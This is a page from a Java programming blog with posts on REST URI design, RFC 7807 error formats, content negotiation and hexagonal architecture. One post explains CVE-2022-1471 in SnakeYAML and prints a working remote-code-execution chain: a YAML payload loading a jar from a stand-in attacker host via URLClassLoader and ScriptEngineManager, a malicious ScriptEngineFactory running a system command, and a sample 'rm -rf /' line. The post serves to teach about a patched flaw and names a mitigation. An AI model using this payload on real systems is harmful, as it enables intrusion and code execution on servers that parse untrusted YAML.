mscharhag, Programming and Stuff;

A blog about programming and software development topics, mostly focused on Java technologies including Java EE, Spring and Grails.

  • Monday, 17 June, 2024

    URI design suggestions

    In this post, we will take a look at URI design for REST APIs. Please note that this is a very subjective topic. So you should take these as general suggestions rather than the definitive way to go.

    On the one hand, URI design is important because it is hard to change URIs later without breaking client code. So it is good to think about URI design before building an API.

    On the other hand, I think some people overemphasise the importance of URI design. You can easily spend a lot of time reading through endless web discussions about various details. Your goal is usually not to come up with the perfect URI design, but to build a pragmatic and consistent API that fulfils a specific business need.

    It is usually much more important to be consistent than to be perfect. So if you choose a certain style of URI design, you should use it consistently, otherwise you may annoy your API users.

    So here are some suggestions for better URI design.

    Avoid case sensitivity, use lower case letters

    Prefer /users/john instead of /Users/John.

    Note that according to RFC 3986 the URI scheme and the domain part are case-insensitive and should be normalised to lower-case. However, the rest of the URI is case-sensitive. So HTTPS://API.My-Company.com is the same as https://api.my-company.com, but http://api.my-company.com/USERS is not the same as http://api.my-company.com/users.

    To complicate matters further, certain pieces of technology may handle things differently. In short: There is no need for this extra complexity.

    Prefer hyphens over spaces and underscores

    You will probably need a way to separate multiple words within a URI. The most commonly used character for this is the hyphen (-).

    Spaces in URIs need to be encoded as %20. So /weather report becomes /weather%20report, which is difficult for humans to read.

    The underscore is another option, but it is slightly less user-friendly than the hyphen. The reason is simply that URIs are often underlined within text passages, which makes underscores hard to spot and easy to mistake for spaces.

    Use hyphens over camel case

    This is basically a corollary to the previous two points. If we want to remove case sensitivity, we cannot use camel case. So we need another way of separating words, which is to use the hyphen character. So /weatherReport becomes /weather-report.

    Avoid trailing slashes

    Use /cars instead of /cars/.

    Trailing slashes confuse people; there is no reason why /cars/ should be different from /cars. A trailing slash is easy to forget and can cause hard-to-find errors in routing and web server configurations.

    Avoid media types and file formats in URIs

    Use /users/123 instead of /users/123.json.

    The URI describes a resource, not a data format. A single resource can be provided in different representations (aka formats). With HTTP we should use content negotiation to decide which resource representation should be returned by the server.
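
    For example, a client that prefers JSON can ask for it via the Accept header:

    GET /users/123
    Accept: application/json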

    URIs describe resources not operations

    With REST, we use URIs to identify resources (like users, posts, or the image with ID 1234). For operations (like getUsers or deleteImage) we use HTTP verbs.

    So we should use

    GET /users
    POST /posts
    DELETE /images/1234

    instead of

    POST /getUsers
    GET /createPost?title=..
    POST /images/1234/delete

    Be consistent with plural and singular in resource names

    In my opinion it does not matter whether you use /users/123 or /user/123 as long as you are consistent. However, the majority of people seem to prefer the plural version (/users/123).

    If you go with plural, you should be consistent and only use singular names for true singleton resources.

    A few examples:

    /users        collection of all users
    /users/123    single user with id 123 from the collection
    /author       singleton resource, not a collection, there is only one author

    Do not use query parameters to alter state

    Query parameters are useful for various things, such as filtering and sorting collections. However, you should not use them to alter resource state.
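
    For example, using query parameters to filter or sort a collection is perfectly fine (the parameter names here are just illustrative):

    GET /users?active=true&sort=name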

    Use the HTTP Verbs PUT, POST, DELETE or PATCH to alter resource state. If clients need to provide additional information use the request body.

    For example, if you want to change the name of user 123 to John use something like

    PUT /users/123
    Content-Type: application/json
    {
      "name": "John"
    }

    instead of

    PUT /users/123?name=john

    See POST vs PUT vs PATCH for more details.

    URIs are hierarchical

    URIs identify resources hierarchically. Sub-resources usually have a 1:n or 1:1 relationship with the parent resource.

    For example, suppose we have an application that allows users to join groups. Within groups, users can create and comment on posts. So a post belongs to exactly one group and a comment belongs to exactly one post. To represent this relationship, we can come up with the following URI hierarchy:

    /groups
    returns the collection of all available groups
    
    /groups/111
    returns details about a specific group (here 111)
    
    /groups/111/posts
    returns the collection of posts for group 111
    
    /groups/111/posts/222
    returns details about post 222 in group 111
    
    /groups/111/posts/222/comments
    returns the comments for post 222 in group 111

    If there is no clear hierarchy, query parameters can be a good option.

    Suppose we want to provide a route planning service. To get a route from Berlin to Paris, we could use /route/berlin/paris. However, this implies that the destination (paris) is a sub-resource of the start location (berlin), which does not seem right.

    A better way is to use query parameters. For example:

    /route?from=berlin&to=paris

  • Tuesday, 6 June, 2023

    Constructing a malicious YAML file for SnakeYAML (CVE-2022-1471)

    In this post we will take a closer look at SnakeYAML and CVE-2022-1471.

    SnakeYAML is a popular Java library for parsing YAML files. For example, Spring Boot uses SnakeYAML to parse YAML configuration files.

    In late 2022, a critical vulnerability was discovered in SnakeYAML (referred to as CVE-2022-1471). This allowed an attacker to perform remote code execution by providing a malicious YAML file. The problem was fixed in SnakeYAML 2.0, released in February 2023.

    I recently looked into this vulnerability and learned a few things that I'll try to break down in this post.

    Parsing YAML files with SnakeYAML

    Before we look at the actual security issue, let us take a quick look at how SnakeYAML is actually used in a Java application.

    Suppose we have the following YAML file named person.yml:

    person:
      firstname: john
      lastname: doe
      address:
        street: fooway 42
        city: baz town
    

    In our Java code we can parse this YAML file with SnakeYAML like this:

    Yaml yaml = new Yaml();
    FileInputStream fis = new FileInputStream("/path/to/person.yml");
    Map<String, Object> parsed = yaml.load(fis);
    
    Map<String, Object> person = (Map<String, Object>) parsed.get("person");
    person.get("firstname");  // "john"
    person.get("lastname");   // "doe"
    person.get("address");    // another map with keys "street" and "city"

    yaml.load(fis) returns a Map<String, Object> instance that we can navigate through to get the values defined in the YAML file.

    Mapping YAML content to objects

    Unfortunately, working with maps is usually not very pleasant. So SnakeYAML provides several ways to map YAML content to Java objects.

    One way is to use the !! syntax to set a Java type within a YAML object:

    person:
      !!demo.Person
      firstname: john
      lastname: doe
      address:
        street: fooway 42
        city: baz town

    This tells SnakeYAML to map the contents of the person object to the demo.Person Java class, which looks like this:

    public class Person {
        private String firstname;
        private String lastname;
        private Address address; // has getter and setter for street and city
    
        // getter and setter
    }

    We can now parse the YAML file and get the person object with the mapped YAML values like this:

    Map<String, Object> parsed = yaml.load(fis);
    Person person = (Person) parsed.get("person");
    

    SnakeYAML now creates a new Person object using the default constructor and uses setters to set the values defined in the YAML file. We can also instruct SnakeYAML to use constructor parameters instead of setters to set values.

    For example, suppose we have the following simple Email value object:

    public class Email {
        private String value;
    
        public Email(String value) {
            this.value = value;
        }
    
        // getter
    }

    Within the YAML file, we can tell SnakeYAML to create an Email object by enclosing the constructor argument in square brackets:

    person:
      firstname: john
      lastname: doe
      email: !!demo.Email [ john@doe.com ]
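
    When this file is parsed, SnakeYAML calls the Email constructor with the given value. A quick sketch of the result (assuming a getValue() getter on Email):

    Map<String, Object> parsed = yaml.load(fis);
    Map<String, Object> person = (Map<String, Object>) parsed.get("person");
    Email email = (Email) person.get("email");  // constructed via new Email("john@doe.com")
    email.getValue();  // "john@doe.com"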

    Where is the security issue?

    What we have seen so far is really all we need to run malicious code from a YAML file. SnakeYAML allows us to create classes, pass constructor parameters and call setters from a provided YAML file.

    Assume for a moment that there is a RunSystemCommand class available in the class path. This class executes the system command passed in the constructor as soon as it is created. We could then provide the following YAML file:

    foo: !!bad.code.RunSystemCommand [ rm -rf / ]

    This would run the rm -rf / system command right after the object is instantiated by SnakeYAML.

    Obviously this is a bit too simple, as such a class is unlikely to exist in the classpath. Also remember that we can only control constructors and setters through the YAML file. We cannot call arbitrary methods.

    However, there are some interesting classes available in the standard Java library that can be used. A very promising combination is ScriptEngineManager together with URLClassLoader. We will now learn a bit more about these two classes before integrating them into a YAML file.

    Loading remote code via URLClassLoader

    URLClassLoader is a Java ClassLoader that can load classes and resources from jar files located at specified URLs. We can create a URLClassLoader like this:

    URL[] urls = { new URL("http://attacker.com/malicious-code.jar") };
    URLClassLoader classLoader = new URLClassLoader(urls);
    

    URLClassLoader takes an array of URLs as a constructor parameter. Here we pass a single URL pointing to a jar file on a remote server controlled by the attacker. Our classLoader instance can now be used to load classes from the remote jar file.

    If you are curious about how to load a class from a ClassLoader and use it via reflection, here is a simple example. However, this is not necessary for our SnakeYAML experiment.

    // load class foo.bar.BadCode using the classLoader
    Class<?> loadedClass = classLoader.loadClass("foo.bar.BadCode");
    
    // create a new instance of foo.bar.BadCode using the default constructor
    Object instance = loadedClass.getDeclaredConstructor().newInstance();
    
    // run the method runMaliciousCode() on our new instance
    Method runMaliciousCode = loadedClass.getMethod("runMaliciousCode");
    runMaliciousCode.invoke(instance);
    

    Using ScriptEngineManager to run code for us

    ScriptEngineManager is another standard Java library class. It implements a discovery and instantiation mechanism for Java script engine support. ScriptEngineManager uses the Java Service Provider mechanism to discover and instantiate available ScriptEngineFactory classes.

    The ClassLoader used by ScriptEngineManager can be passed as a constructor parameter:

    URL[] urls = { new URL("http://attacker.com/malicious-code.jar") };
    URLClassLoader classLoader = new URLClassLoader(urls);
    new ScriptEngineManager(classLoader);

    Here, the newly created ScriptEngineManager will look for ScriptEngineFactory implementations in our attacker-controlled remote jar. And more dangerously: It will instantiate eligible classes from that jar, giving the attacker the ability to run their own code.

    But what content must be provided in the remote jar file?

    We start by creating a malicious implementation of ScriptEngineFactory:

    package foo.bar;
    
    import java.io.IOException;
    import javax.script.ScriptEngineFactory;
    
    public class BadScriptEngineFactory implements ScriptEngineFactory {
        @Override
        public String getEngineName() {
            try {
                Runtime.getRuntime().exec("calc");
            } catch (IOException e) {
                throw new RuntimeException(e);
            }
            return null;
        }
    
        // empty stubs for other interface methods
    }

    The first method that ScriptEngineManager calls after instantiating a ScriptEngineFactory is getEngineName(). So we use this method to execute our malicious code. In this example, we simply run the calc system command, which starts the calculator on a Windows system. This is a simple proof that we can run a system command from the provided jar file.

    As mentioned earlier, ScriptEngineManager uses the Java Service Provider mechanism to find classes that implement the ScriptEngineFactory interface.

    So we need to create a service provider configuration for our ScriptEngineFactory. We do this by creating a file called javax.script.ScriptEngineFactory in the META-INF/services directory. This file must contain the fully qualified name of our ScriptEngineFactory:

    foo.bar.BadScriptEngineFactory

    We then package the class and the configuration file into a jar file called malicious-code.jar. The final layout inside the jar file looks like this:

    • malicious-code.jar
      • META-INF
        • services
          • javax.script.ScriptEngineFactory
        • MANIFEST.MF
      • foo
        • bar
          • BadScriptEngineFactory.class

    We can now put this jar file on a server and make it available to the URLClassLoader used by the ScriptEngineManager.

    To recap the snippet shown earlier:

    URL[] urls = { new URL("http://attacker.com/malicious-code.jar") };
    URLClassLoader classLoader = new URLClassLoader(urls);
    new ScriptEngineManager(classLoader);

    ScriptEngineManager should now detect the BadScriptEngineFactory class within the malicious-code.jar file. Once the factory is instantiated, ScriptEngineManager calls its getEngineName() method, which executes the calc system command. So running this code on a Windows system should open the Windows Calculator.

    Constructing a malicious YAML file

    Now we know enough to return to our original goal: constructing a malicious YAML file for SnakeYAML. As you may have noticed, the previous snippet only included constructor calls and the construction of an array. Both of these can be expressed within a YAML file.

    So the final YAML file looks like this:

    person: !!javax.script.ScriptEngineManager [
        !!java.net.URLClassLoader [[
            !!java.net.URL [http://attacker.com/malicious-code.jar]
        ]]
    ]

    We create a simple person YAML object. For the value we use the !! syntax we saw earlier to create a ScriptEngineManager.

    As a constructor parameter we pass a URLClassLoader with a URL pointing to our malicious jar file. Notice that we open two square brackets after URLClassLoader. One to indicate that a constructor argument follows and a second to define an array.

    When this YAML file is parsed with a vulnerable version of SnakeYAML on a Windows system, the calculator opens. This proves that an attacker is able to run code and execute system commands by providing a malicious YAML file.
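
    Besides upgrading to SnakeYAML 2.0, a common mitigation for older versions is to parse untrusted input with SafeConstructor, which only constructs standard Java types and rejects arbitrary classes. A minimal sketch, assuming the SnakeYAML 1.x API:

    // SafeConstructor refuses to instantiate arbitrary classes via the !! syntax,
    // so parsing the ScriptEngineManager payload above fails with an exception
    Yaml yaml = new Yaml(new SafeConstructor());
    Map<String, Object> parsed = yaml.load(fis);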

  • Monday, 15 August, 2022

    A standardized error format for HTTP responses

    HTTP uses status codes to indicate the result of the server's attempt to satisfy the request. If the server is unable to process the request, we can choose from a variety of HTTP error codes.

    Unfortunately, status codes alone often do not provide enough information for API clients. For example, a server might respond with the status code 400 (Bad Request) to indicate that the client sent an invalid request. Wouldn't it be nice if the response body told us which specific part of the request was invalid, or how to resolve the problem?

    Status codes are used to define higher-level error classes, while error details are usually part of the response body. Many APIs use a custom error format for response bodies to provide additional problem information. However, there is also a standard that can help us here, defined in RFC 7807.

    RFC 7807 defines a data model for problem details in JSON and XML. Before coming up with a new generic fault or error response format for your API, it might be worth looking into RFC 7807. However, it is absolutely fine to use your own domain-specific format if that fits your application better.

    RFC 7807: Problem Details for HTTP APIs

    An HTTP response using RFC 7807 might look like this:

    HTTP/1.1 400 Bad Request
    Content-Type: application/problem+json
    Content-Language: en
    
    {
        "type": "https://api.my-cool-example.com/problems/required-field-missing",
        "title": "Required field is missing",
        "detail": "Article with id 1234 cannot be updated because the required field 'title' is missing",
        "status": 400,
        "instance": "/articles/1234",
        "field": "title"
    }
    

    As usual, the HTTP status code (400, Bad Request) gives us a broad indication of the problem. Notice the response Content-Type of application/problem+json. This tells us that the response contains an RFC 7807-compliant body. When using XML instead of JSON, the Content-Type application/problem+xml is used.

    A problem details JSON response can have the following members:

    • type (string) - A URI reference that identifies the problem type.
    • title (string) - A short human-readable summary of the problem type. It should not change between multiple occurrences of the same problem type, except for purposes of localization.
    • status (number) - The HTTP status code generated by the origin server.
    • detail (string) - A human-readable description of this specific problem occurrence.
    • instance (string) - A URI that identifies the resource related to this specific problem occurrence.

    All fields are optional. However, you should at least provide a type value as this is used by consumers to identify the specific problem type. Consumers should not parse the title or detail fields.

    Problem types

    Problem types are used to identify specific problems. A problem type must document:

    • A type URI (that is used in the type field of the response).
    • A title that describes the problem (used in the title field of the response).
    • The HTTP status code it is used with.

    The type URI should resolve to a human-readable documentation of the problem (e.g. an HTML document). This URI should be under your control and stable over time.

    Problem types may also specify the use of a Retry-After response header if appropriate.

    RFC 7807 reserves one special URI as a problem type: about:blank. The problem type about:blank can be used if the problem has no additional semantics besides that of the HTTP status code. In this case, the title should be the same as the HTTP status phrase for that code (e.g. Bad Request for HTTP status 400).
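
    For example, a response using the about:blank problem type might look like this:

    HTTP/1.1 404 Not Found
    Content-Type: application/problem+json
    
    {
        "type": "about:blank",
        "title": "Not Found",
        "status": 404
    }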

    Extension members

    Problem types may extend the problem details object with additional members to provide additional information.

    The field member from the example response shown above is an example of such an extension member. It belongs to the required-field-missing problem type and indicates the missing field. A consumer might parse this member to construct an appropriate error message for the end-user.
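
    If you are using Spring, recent framework versions ship RFC 7807 support out of the box. A minimal sketch, assuming Spring Framework 6's ProblemDetail class, that builds the example response from above:

    ProblemDetail problem = ProblemDetail.forStatusAndDetail(HttpStatus.BAD_REQUEST,
            "Article with id 1234 cannot be updated because the required field 'title' is missing");
    problem.setType(URI.create("https://api.my-cool-example.com/problems/required-field-missing"));
    problem.setTitle("Required field is missing");
    problem.setInstance(URI.create("/articles/1234"));
    problem.setProperty("field", "title");  // extension member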

    Conclusion

    HTTP status codes alone are often not enough to provide a meaningful problem description.

    RFC 7807 defines a standardized format for more detailed problem descriptions within the body of an HTTP response. Before coming up with just another custom error response format, it might be a good idea to look at the RFC 7807 problem format.

  • Monday, 22 November, 2021

    HTTP - Content negotiation

    With HTTP, resources are identified using URIs, and a uniquely identified resource might support multiple representations. A representation is a specific form of a particular resource.

    For example:

    • an HTML page /index.html might be available in different languages
    • product data located at /products/123 can be served in JSON, XML or CSV
    • an avatar image /user/avatar might be available in JPEG, PNG and GIF formats

    In all these cases one underlying resource has multiple different representations.

    Content negotiation is the mechanism used by clients and servers to decide which representation should be used.

    Server-driven and agent-driven content negotiation

    We can differentiate between server-driven and agent-driven content negotiation.

    With server-driven content negotiation the client tells the server which representations are preferable. The server then picks the representation that best fits the client's needs.

    When using agent-driven content negotiation the server tells the client which representations are available. The client then picks the best matching option.

    In practice, server-driven negotiation is used almost exclusively. Unfortunately, there is no standardized format for doing agent-driven negotiation. Additionally, agent-driven negotiation is usually also worse for performance, as it requires an additional request/response round trip. In the rest of this article we will therefore focus on server-driven negotiation.

    Accept headers

    With server-driven negotiation the client uses headers to indicate supported content formats. A server-side algorithm then uses these headers to decide which resource representation should be returned.

    Most commonly used is the Accept header, which communicates the media type preferred by the client. For example, consider the following simple HTTP request containing an Accept header:

    GET /monthly-report
    Accept: text/html; q=1.0, text/*; q=0.8

    The header tells the server that the client understands HTML (media type text/html) and other text-based formats (media type text/*).

    text/* indicates that all subtypes of the text type are supported. To indicate that all media types are supported we can use */*.

    In this example, HTML is preferred over other text-based formats because it has a higher quality factor (q).
    
    Ideally, a server would respond to this request with an HTML document. For example:

    HTTP/1.1 200 OK
    Content-Type: text/html
    
    <html>
        <body>
            <h1>Monthly report</h1>
            ...
        </body>
    </html>

    If returning HTML is not feasible, the server can also respond with another text-based format, like text/plain:

    200 OK
    Content-Type: text/plain
    
    Monthly report
    Bla bli blu
    ...

    Besides the Accept header, there are also the Accept-Language and Accept-Encoding headers we can use. Accept-Language indicates the language preference of the client, while Accept-Encoding defines the acceptable content encodings.

    Of course all these headers can be used together. For example:

    GET /monthly-report
    Accept: text/html
    Accept-Language: en-US; q=1.0, en; q=0.9, fr; q=0.4
    Accept-Encoding: gzip, br

    Here the client indicates that he prefers

    • an HTML document
    • US English (preferred, q=1.0) but other English variations are also fine (q=0.9). If English is not available, French can do the job too (q=0.4)
    • gzip and Brotli (br) content encodings

    An acceptable response might look like this:

    200 OK
    Content-Type: text/html
    Content-Language: en
    Content-Encoding: gzip
    
    <gzipped html document>

    What if the server cannot return an acceptable response?

    If the server is unable to fulfill the client's preferences, the HTTP status code 406 (Not Acceptable) can be returned. This status code indicates that the server is unable to produce a response matching the client's preferences.

    Depending on the situation, it might also be viable to return a response that does not exactly match the client's preferences. For example, assume that no language provided in the Accept-Language header is supported by the server. In this case, it can still be a valid option to return a response using a predefined default language; this might be more useful for the client than nothing. The client can then look at the Content-Language header of the response and decide if he wants to use the response or ignore it.
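
    For example, a server whose default language is German might still answer a request that only accepts French like this:

    HTTP/1.1 200 OK
    Content-Type: text/html
    Content-Language: de
    
    <html document in German>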

    Content negotiation in REST APIs

    For REST APIs it can be a viable option to support more than one standard representation for resources. For example, with content negotiation we can support JSON and XML and let the client decide what he wants to use.

    CSV can also be an interesting option in certain situations, as the response can be viewed directly with tools like Excel. For example, consider the following request:

    GET /users
    Accept: text/csv
    

    Instead of returning a JSON (or XML) collection, the server can now respond with a list of users in CSV format:

    HTTP/1.1 200 OK
    Content-Type: text/csv
    
    Id;Username;Email
    1;john;john.doe@example.com
    2;anna91;anna91@example.com
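
    On the server side, most web frameworks can dispatch on the Accept header for us. A minimal sketch of how this could look with Spring MVC (the handler names and the inline CSV rendering are just illustrative):

    @GetMapping(value = "/users", produces = "text/csv")
    public String getUsersAsCsv() {
        // selected when the client sends Accept: text/csv
        return "Id;Username;Email\n1;john;john.doe@example.com\n2;anna91;anna91@example.com\n";
    }
    
    @GetMapping(value = "/users", produces = MediaType.APPLICATION_JSON_VALUE)
    public List<User> getUsersAsJson() {
        // selected when the client sends Accept: application/json
        return userService.findAllUsers();
    }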


    Interested in more REST-related articles? Have a look at my REST API design page.

  • Monday, 1 November, 2021

    Avoid leaking domain logic

    Many software architectures try to separate domain logic from other parts of the application. To follow this practice, we always need to know what actually is domain logic and what is not. Unfortunately, this is not always easy to decide. If we get this decision wrong, domain logic can easily leak into other components and layers.

    We will go through this problem by looking at examples using a hexagonal application architecture. If you are not familiar with hexagonal architecture (also called ports and adapters architecture), you might be interested in the previous post about the transition from a traditional layered architecture to a hexagonal architecture.

    Assume a shop system that publishes new orders to a messaging system (like Kafka). Our product owner now tells us that we have to listen for these order events and persist the corresponding order in the database.

    Using hexagonal architecture the integration with a messaging system is implemented within an adapter. So, we start with a simple adapter implementation that listens for Kafka events:

    @AllArgsConstructor
    public class KafkaAdapter {
        private final SaveOrderUseCase saveOrderUseCase;
    
        @KafkaListener(topic = ...)
        public void onNewOrderEvent(NewOrderKafkaEvent event) {
            Order order = event.getOrder();
            saveOrderUseCase.saveOrder(order);
        }
    }

    In case you are not familiar with the @AllArgsConstructor annotation from Project Lombok: it generates a constructor that accepts each field (here saveOrderUseCase) as a parameter.

    The adapter delegates the saving of the order to a UseCase implementation.

    UseCases are part of our domain core and implement domain logic together with the domain model. Our simple example UseCase looks like this:

    @AllArgsConstructor
    public class SaveOrderUseCase {
        private final SaveOrderPort saveOrderPort;
    
        public void saveOrder(Order order) {
            saveOrderPort.saveOrder(order);
        }
    }

    Nothing special here. We simply use an outgoing Port interface to persist the passed order.
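
    For reference, such an outgoing port is just an interface in the domain core that a persistence adapter implements. A minimal sketch (the signature is an assumption derived from its usage here):

    public interface SaveOrderPort {
        void saveOrder(Order order);
    }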

    While the shown approach might work fine, we have a significant problem here: Our business logic has leaked into the Adapter implementation. Maybe you are wondering: what business logic?

    We have a simple business rule to implement: every time a new order is retrieved, it should be persisted. In our current implementation this rule is implemented by the adapter, while our business layer (the UseCase) only provides a generic save operation.

    Now assume, after some time, a new requirement arrives: Every time a new order is retrieved, a message should be written to an audit log.

    With our current implementation we cannot write the audit log message within SaveOrderUseCase. As the name suggests, the UseCase is for saving an order, not for retrieving a new order, and it might therefore be used by other components. So adding the audit log message here might have undesired side effects.

    The solution is simple: We write the audit log message in our adapter:

    @AllArgsConstructor
    public class KafkaAdapter {
    
        private final SaveOrderUseCase saveOrderUseCase;
        private final AuditLog auditLog;
    
        @KafkaListener(topic = ...)
        public void onNewOrderEvent(NewOrderKafkaEvent event) {
            Order order = event.getOrder();
            saveOrderUseCase.saveOrder(order);
            auditLog.write("New order retrieved, id: " + order.getId());
        }
    }

    And now we have made it worse. Even more business logic has leaked into the adapter.

    If the auditLog object writes messages into a database, we might also have screwed up transaction handling, which is usually not handled in an incoming adapter.

    Using more specific domain operations

    The core problem here is the generic SaveOrderUseCase. Instead of providing a generic save operation to adapters we should provide a more specific UseCase implementation.

    For example, we can create a NewOrderRetrievedUseCase that accepts newly retrieved orders:

    @AllArgsConstructor
    public class NewOrderRetrievedUseCase {
        private final SaveOrderPort saveOrderPort;
        private final AuditLog auditLog;
    
        @Transactional
        public void onNewOrderRetrieved(Order newOrder) {
            saveOrderPort.saveOrder(newOrder);
            auditLog.write("New order retrieved, id: " + newOrder.getId());
        }
    }

    Now both business rules are implemented within the UseCase. Our adapter implementation is now simply responsible for mapping incoming data and passing it to the use case:

    @AllArgsConstructor
    public class KafkaAdapter {
        private final NewOrderRetrievedUseCase newOrderRetrievedUseCase;
    
        @KafkaListener(topic = ...)
        public void onNewOrderEvent(NewOrderKafkaEvent event) {
            Order newOrder = event.getOrder();
            newOrderRetrievedUseCase.onNewOrderRetrieved(newOrder);
        }
    }

    This change may only seem like a small difference. However, for future requirements we now have a specific location in our business layer to handle incoming orders. Otherwise, chances are high that new requirements would leak more business logic into places where it should not be located.

    Leaks like this happen especially often with overly generic create, save/update and delete operations in the domain layer. So, try to be very specific when implementing business operations.